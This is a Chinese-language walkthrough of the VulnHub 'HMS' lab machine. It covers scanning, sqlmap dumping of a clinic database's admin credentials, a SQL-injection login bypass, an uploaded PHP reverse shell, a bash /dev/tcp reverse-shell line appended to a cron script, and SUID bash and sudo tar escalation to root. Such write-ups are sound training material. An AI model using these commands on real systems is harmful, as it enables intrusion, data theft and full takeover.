靶机渗透练习65-Hms?

靶机描述

靶机地址:https://www.vulnhub.com/entry/hms-1,728/

Description

easy

This works better with VirtualBox rather than VMware

一、搭建靶机环境

攻击机Kali

IP地址:192.168.9.7

靶机

IP地址:192.168.9.63

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

⬢  Hms  arp-scan -I eth0 -l              
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:21:a2:cb       PCS Systemtechnik GmbH
192.168.9.63    08:00:27:07:33:23       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  Hms  nmap -A -sV -T4 -p- 192.168.9.63
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 10:02 CST
Stats: 0:03:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.60% done; ETC: 10:05 (0:00:02 remaining)
Nmap scan report for bogon (192.168.9.63)
Host is up (0.00043s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.9.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3c:fc:ed:dc:9b:b3:24:ff:2e:c3:51:f8:33:20:78:40 (RSA)
|   256 91:5e:81:68:73:68:65:ec:a2:de:27:19:c6:82:86:a9 (ECDSA)
|_  256 a7:eb:f6:a2:c6:63:54:e1:f5:18:53:fc:c3:e1:b2:28 (ED25519)
7080/tcp open  http    Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1)
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1
MAC Address: 08:00:27:07:33:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms bogon (192.168.9.63)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 242.48 seconds
⬢  Hms  

21---ftp---vsftpd 3.0.3--Anonymous FTP login allowed (FTP code 230)

22--ssh---OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

7080---http---Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29

2.2枚举漏洞

2.2.1 21端口分析

根据扫描结果可知,ftp可通过anonymous 无密码登录

⬢  Hms  ftp 192.168.9.63
Connected to 192.168.9.63.
220 (vsFTPd 3.0.3)
Name (192.168.9.63:hirak0): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||29239|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> cd /home
550 Failed to change directory.
ftp> 

啥也没有

2.2.2 7080 端口分析

访问:http://192.168.9.63:7080/

image-20220401101311368

是一个登录表单,先放一边

扫描一下目录:gobuster dir -u http://192.168.9.63:7080 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

⬢  Hms  gobuster dir -u http://192.168.9.63:7080 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.63:7080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,zip,bak,txt,php
[+] Timeout:                 10s
===============================================================
2022/04/01 10:37:44 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 14041] [--> login.php]
/login.php            (Status: 200) [Size: 4087]                 
/profile.php          (Status: 302) [Size: 13736] [--> login.php]
/files                (Status: 301) [Size: 239] [--> http://192.168.9.63:7080/files/]
/pages                (Status: 301) [Size: 239] [--> http://192.168.9.63:7080/pages/]
/header.php           (Status: 200) [Size: 4924]                                     
/signup.php           (Status: 200) [Size: 6514]                                     
/footer.php           (Status: 200) [Size: 1783]                                     
/test.php             (Status: 200) [Size: 6]                                        
/logout.php           (Status: 200) [Size: 48]                                       
/head.php             (Status: 200) [Size: 1741]                                     
/connect.php          (Status: 200) [Size: 1]                                        
/sidebar.php          (Status: 200) [Size: 2238]                                     
/forgot_password.php  (Status: 200) [Size: 5614]                                     
/department.php       (Status: 302) [Size: 13653] [--> login.php]                    
/medicine.php         (Status: 302) [Size: 13972] [--> login.php]                    
/doctor.php           (Status: 302) [Size: 16844] [--> login.php]                    
/phpmyadmin           (Status: 403) [Size: 1190]                                     
/treatment.php        (Status: 302) [Size: 13963] [--> login.php]                    
/setting.php          (Status: 302) [Size: 16372] [--> login.php]                    
/appointment.php      (Status: 302) [Size: 16267] [--> login.php]                    
/changepassword.php   (Status: 302) [Size: 13858] [--> login.php]                    
/patient.php          (Status: 302) [Size: 18076] [--> login.php]                    
                                                                                     
===============================================================
2022/04/01 10:43:26 Finished
===============================================================
⬢  Hms 

访问:http://192.168.9.63:7080/files/

image-20220401104802343

访问:http://192.168.9.63:7080/pages/

image-20220401104810756

访问:http://192.168.9.63:7080/phpmyadmin

image-20220401104823896

并没有什么其他发现

2.3漏洞利用

2.3.1 SQL注入测试

尝试SQLmap一把梭一下

image-20220401105659373

执行命令sqlmap -r test.sql --batch --dbs

成功爆破出数据库

available databases [6]:
[*] clinic_db
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

爆数据表sqlmap -r test.sql --batch -D clinic_db --tables

Database: clinic_db
[24 tables]
+----------------------+
| user                 |
| admin                |
| appointment          |
| billing              |
| billing_records      |
| department           |
| doctor               |
| doctor_timings       |
| manage_website       |
| medicine             |
| orders               |
| patient              |
| payment              |
| prescription         |
| prescription_records |
| room                 |
| service_type         |
| tbl_email_config     |
| tbl_permission       |
| tbl_permission_role  |
| tbl_role             |
| tbl_sms_config       |
| treatment            |
| treatment_records    |
+----------------------+

爆字段sqlmap -r test.sql --batch -D clinic_db -T admin --col

Database: clinic_db
Table: admin
[17 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| addr          | varchar(500)  |
| created_on    | date          |
| delete_status | int(11)       |
| dob           | text          |
| fname         | varchar(50)   |
| gender        | varchar(500)  |
| id            | int(11)       |
| image         | varchar(2000) |
| last_login    | date          |
| lname         | varchar(500)  |
| loginid       | varchar(30)   |
| mobileno      | text          |
| notes         | varchar(200)  |
| password      | varchar(100)  |
| role_id       | int(11)       |
| updated_on    | date          |
| username      | varchar(500)  |
+---------------+---------------+

爆值

sqlmap -r test.sql --batch -D clinic_db -T admin -C username,loginid,password --dump

Database: clinic_db
Table: admin
[1 entry]
+----------+------------------------+---------------------------------------------------+
| username | loginid                | password                                           
+----------+------------------------+---------------------------------------------------+
| admin    | ndbhalerao91@gmail.com | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357
+----------+------------------------+---------------------------------------------------+

拿到账户密码,不过密码应该是加密过的

试试手工注入看看能不能进入后台

image-20220401144856732

删掉 type 字段,

image-20220401145132521

成功登录进入后台

image-20220401145309979

进行信息收集,在http://192.168.9.63:7080/setting.php发现可以上传文件

image-20220401145623010

尝试上传webshell

但是不知道上传到哪里了

查看一下源码看看有没有路径啥的

image-20220401150056184

看到了上传路径

尝试访问:http://192.168.9.63:7080/uploadImage/Logo/php-reverse-shell.php

kali本地监听:nc -lvp 6666

⬢  Hms  nc -lvp 6666             
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.63] 38846
Linux nivek 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 12:32:08 up  2:33,  0 users,  load average: 0.00, 0.01, 0.19
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$ 

成功拿到shell

使用 Python 切换至交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'

$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@nivek:/$ 

2.4权限提升

2.4.1 信息收集

简单信息收集一波

daemon@nivek:/$ sudo -l
sudo -l
[sudo] password for daemon: 
Sorry, try again.
[sudo] password for daemon: 
Sorry, try again.
[sudo] password for daemon: 
sudo: 3 incorrect password attempts
daemon@nivek:/$ ls -al
ls -al
total 104
drwxr-xr-x  23 root root  4096 Apr  1 10:11 .
drwxr-xr-x  23 root root  4096 Apr  1 10:11 ..
drwxr-xr-x   2 root root  4096 Apr  1 10:07 bin
drwxr-xr-x   3 root root  4096 Apr  1 10:12 boot
-rw-------   1 root root     0 Jul 25  2021 core
drwxr-xr-x  19 root root  4220 Apr  1 11:48 dev
drwxr-xr-x 137 root root 12288 Apr  1 10:12 etc
drwxr-xr-x   4 root root  4096 Jul 26  2021 home
lrwxrwxrwx   1 root root    33 Apr  1 10:11 initrd.img -> boot/initrd.img-4.4.0-210-generic
lrwxrwxrwx   1 root root    32 Apr  1 10:11 initrd.img.old -> boot/initrd.img-4.4.0-21-generic
drwxr-xr-x  23 root root  4096 Jul 26  2021 lib
drwxr-xr-x   2 root root  4096 Jul 25  2021 lib64
drwx------   2 root root 16384 Jul 25  2021 lost+found
drwxr-xr-x   4 root root  4096 Jul 26  2021 media
drwxr-xr-x   2 root root  4096 Apr 21  2016 mnt
drwxr-xr-x   3 root root  4096 Jul 25  2021 opt
dr-xr-xr-x 144 root root     0 Apr  1 09:59 proc
drwx------  19 root root  4096 Jul 26  2021 root
drwxr-xr-x  27 root root  1080 Apr  1 10:13 run
drwxr-xr-x   2 root root 12288 Apr  1 10:07 sbin
drwxr-xr-x   2 root root  4096 Apr  1 10:09 snap
drwxr-xr-x   3 root root  4096 Jul 25  2021 srv
dr-xr-xr-x  13 root root     0 Apr  1 09:59 sys
drwxrwxrwt   8 root root  4096 Apr  1 12:35 tmp
drwxr-xr-x  10 root root  4096 Jul 26  2021 usr
drwxr-xr-x  16 root root  4096 Jul 25  2021 var
lrwxrwxrwx   1 root root    30 Apr  1 10:11 vmlinuz -> boot/vmlinuz-4.4.0-210-generic
lrwxrwxrwx   1 root root    29 Apr  1 10:11 vmlinuz.old -> boot/vmlinuz-4.4.0-21-generic
daemon@nivek:/$ cd /home
cd /home
daemon@nivek:/home$ ls -al
ls -al
total 16
drwxr-xr-x  4 root  root  4096 Jul 26  2021 .
drwxr-xr-x 23 root  root  4096 Apr  1 10:11 ..
drwx-----x  4 eren  eren  4096 Jul 26  2021 eren
drwxr-xr-x 16 nivek nivek 4096 Jul 26  2021 nivek
daemon@nivek:/home$ cd eren
cd eren
daemon@nivek:/home/eren$ ls -al
ls -al
ls: cannot open directory '.': Permission denied
daemon@nivek:/home/eren$ cd /home/nivek
cd /home/nivek
daemon@nivek:/home/nivek$ ls -al
ls -al
total 104
drwxr-xr-x 16 nivek nivek 4096 Jul 26  2021 .
drwxr-xr-x  4 root  root  4096 Jul 26  2021 ..
-rw-------  1 nivek nivek  425 Jul 26  2021 .bash_history
-rw-r--r--  1 nivek nivek  220 Jul 25  2021 .bash_logout
-rw-r--r--  1 nivek nivek 3771 Jul 25  2021 .bashrc
drwx------ 13 nivek nivek 4096 Jul 26  2021 .cache
drwx------ 14 nivek nivek 4096 Jul 26  2021 .config
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Desktop
-rw-r--r--  1 nivek nivek   25 Jul 25  2021 .dmrc
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Documents
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Downloads
drwx------  2 nivek nivek 4096 Jul 26  2021 .gconf
drwx------  3 nivek nivek 4096 Jul 26  2021 .gnupg
-rw-------  1 nivek nivek  942 Jul 26  2021 .ICEauthority
drwx------  3 nivek nivek 4096 Jul 26  2021 .local
-rw-r--r--  1 root  root    33 Jul 25  2021 local.txt
drwx------  5 nivek nivek 4096 Jul 26  2021 .mozilla
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Music
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Pictures
-rw-r--r--  1 nivek nivek  675 Jul 25  2021 .profile
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Public
-rw-r--r--  1 nivek nivek    0 Jul 25  2021 .sudo_as_admin_successful
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Templates
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Videos
-rw-------  1 nivek nivek   50 Jul 26  2021 .Xauthority
-rw-------  1 nivek nivek 1354 Jul 26  2021 .xsession-errors
-rw-------  1 nivek nivek 1788 Jul 26  2021 .xsession-errors.old

在 shell 中寻找 suid 程序:find / -perm -u=s -type f 2>/dev/null

daemon@nivek:/home/nivek$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/mount
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/bash
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/opt/lampp/bin/suexec
daemon@nivek:/home/nivek$ 

https://gtfobins.github.io查找到bash

image-20220401151129481

image-20220401151257181

daemon@nivek:/home/nivek$ /usr/bin/bash -p
/usr/bin/bash -p
bash-4.3$ id
id
uid=1(daemon) gid=1(daemon) euid=1002(eren) groups=1(daemon)
bash-4.3$ whoami
whoami
eren
bash-4.3$ 

成功切换至eren用户

bash-4.3$ sudo -l
sudo -l
[sudo] password for daemon: 
Sorry, try again.
[sudo] password for daemon: 
Sorry, try again.
[sudo] password for daemon: 
sudo: 3 incorrect password attempts

没法搞,继续查看相关文件,看一下有没有可以利用的

bash-4.3$ cd /home/eren
cd /home/eren
bash-4.3$ ls -al
ls -al
total 40
drwx-----x 4 eren eren   4096 Jul 26  2021 .
drwxr-xr-x 4 root root   4096 Jul 26  2021 ..
drwxr-xr-x 2 eren eren   4096 Jul 26  2021 backups
-rwxr-xr-x 1 eren daemon   95 Jul 26  2021 backup.sh
-rw------- 1 eren eren      1 Jul 26  2021 .bash_history
-rw-r--r-- 1 eren eren    220 Sep  1  2015 .bash_logout
-rw-r--r-- 1 eren eren   3786 Jul 26  2021 .bashrc
drwxrwxr-x 2 eren eren   4096 Jul 26  2021 .nano
-rw-r--r-- 1 eren eren    675 Sep  1  2015 .profile
-rw-rw-r-- 1 eren eren     66 Jul 26  2021 .selected_editor
bash-4.3$ cd backups
cd backups
bash-4.3$ ls -al
ls -al
total 12
drwxr-xr-x 2 eren eren 4096 Jul 26  2021 .
drwx-----x 4 eren eren 4096 Jul 26  2021 ..
-rw-rw-r-- 1 eren eren 3400 Apr  1 12:45 backup.tar.gz
bash-4.3$ cd ..
cd ..
bash-4.3$ cat backup.sh
cat backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
bash-4.3$ cat .bash_history
cat .bash_history

bash-4.3$ 

看到这个备份脚本,可能跟定时任务有关

咱们查看一下定时任务文件

bash-4.3$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * eren /home/eren/backup.sh
bash-4.3$ 

发现每隔五分钟运行一次backup.sh

咱们可以通过在 /home/eren/backup.sh 中写入 shell进行提权

echo "bash -i >& /dev/tcp/192.168.9.7/6666 0>&1" >> backup.sh

bash-4.3$ ls
ls
backups  backup.sh
bash-4.3$ echo "bash -i >& /dev/tcp/192.168.9.7/6666 0>&1" >> backup.sh
echo "bash -i >& /dev/tcp/192.168.9.7/6666 0>&1" >> backup.sh
bash-4.3$ cat backup.sh
cat backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
bash -i >& /dev/tcp/192.168.9.7/6666 0>&1
bash-4.3$ 

kali本地监听一下nc -lvp 6666

⬢  Hms  nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.63] 38848
bash: cannot set terminal process group (20361): Inappropriate ioctl for device
bash: no job control in this shell
eren@nivek:~$ id
id
uid=1002(eren) gid=1003(eren) groups=1003(eren)
eren@nivek:~$ sudo -l
sudo -l
Matching Defaults entries for eren on nivek:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eren may run the following commands on nivek:
    (root) NOPASSWD: /bin/tar
eren@nivek:~$ 

发现可以用root权限运行/bin/tar

https://gtfobins.github.io查找一下

image-20220401152353675

运行该命令

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

eren@nivek:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
</dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh         
tar: Removing leading `/' from member names
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
Desktop
Documents
Downloads
Music
Pictures
Public
root.txt
Templates
Videos
cat root.txt
299c10117c1940f21b70a391ca125c5d

成功提权,并拿到flag

总结

本靶机通过SQL注入登录后台,找到文件上传点,上传反弹shell拿到shell,通过/usr/bin/bash切换用户,然后通过在 /home/eren/backup.sh 中写入 shell,最后通过tar提权

  1. 主机发现
  2. 信息收集
  3. 目录扫描---gobuster
  4. SQLmap一把梭
  5. sql手工注入进入后台
  6. 文件上传漏洞
  7. sudo提权---tar提权
posted @ 2022-04-08 17:46  hirak0  阅读(354)  评论(0编辑  收藏  举报